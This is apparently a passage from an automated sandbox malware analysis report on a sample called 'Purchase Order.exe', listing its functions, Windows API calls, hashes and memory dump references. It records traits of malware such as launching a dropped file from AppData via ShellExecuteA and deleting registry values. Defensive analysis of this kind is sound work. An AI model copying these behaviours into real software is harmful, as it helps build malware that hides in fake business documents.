                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                          • Instruction ID: 20ca943cec1bfd02e9a7b8a7961d2af95be0026f17772609ad776ff58b8bf793
                                                          • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                          • Instruction Fuzzy Hash: 1601487254420EEFEB128F64EC48EEB3FACEF15394B004126FA04A6220D235D964CBA5
                                                          Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 167947723-0
                                                          • Opcode ID: 3f61a526725af8e0efbbcf8dc5261376e52401e1169cdb67d91474a7666bd89c
                                                          • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                          • Opcode Fuzzy Hash: 3f61a526725af8e0efbbcf8dc5261376e52401e1169cdb67d91474a7666bd89c
                                                          • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                          Function 00401DEA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\potentially\Avantgarders,?), ref: 00401E30
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially\Avantgarders, xrefs: 00401E1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: C:\Users\user\AppData\Local\potentially\Avantgarders
                                                          • API String ID: 587946157-1472172179
                                                          • Opcode ID: cf3a1bfeca279b0df6f4b5d5e9d75bf75bbf282e463632b97899a83b3f580d51
                                                          • Instruction ID: a548c815147b4704bf0f960bb31f45274aca7984404dfa9c911a50ac01e0136c
                                                          • Opcode Fuzzy Hash: cf3a1bfeca279b0df6f4b5d5e9d75bf75bbf282e463632b97899a83b3f580d51
                                                          • Instruction Fuzzy Hash: 90F0F632B141006FDB11ABB59D4AF9E27A9AB65319F20493BF141F71C2DAFC88419B28
                                                          Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                          • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                          • Opcode Fuzzy Hash: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                          • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                          • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                          • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                          • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                          Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                          • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                          • Opcode Fuzzy Hash: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                          • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                          Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00010452), ref: 00401579
                                                          • ShowWindow.USER32(0001044C), ref: 0040158E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                          • Instruction ID: b54bb08643918bb8896a5862ce8d2e5c56cc7996104e834ef2f2724ba304e424
                                                          • Opcode Fuzzy Hash: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                          • Instruction Fuzzy Hash: A5E0E57BB182405FEB21DB64AD9086D7BA29B95310795017BD101A7591C2789C09C728
                                                          Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                            • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                            • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                            • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                          • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                          • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                          • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                          Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059A6
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                          • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                          • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                          • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                          Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                          • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                          • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                          • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                          Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                          • GetLastError.KERNEL32 ref: 0040549F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                          • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                          • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                          • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                          Function 00401662 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 0040167D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: fc9ffe6ed8b48b677133cb54e85f07391461bf8d88784c8962aa294f1e3cd555
                                                          • Instruction ID: 213e299c3c991b1d5f85066edd92eb9da76011fda99402bbbffec67db0907874
                                                          • Opcode Fuzzy Hash: fc9ffe6ed8b48b677133cb54e85f07391461bf8d88784c8962aa294f1e3cd555
                                                          • Instruction Fuzzy Hash: 5BF02431E08120ABDB20BB768E0DE4F2168AB61369B34473BB102B21D1DABC8402557F
                                                          Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                          • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                          • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
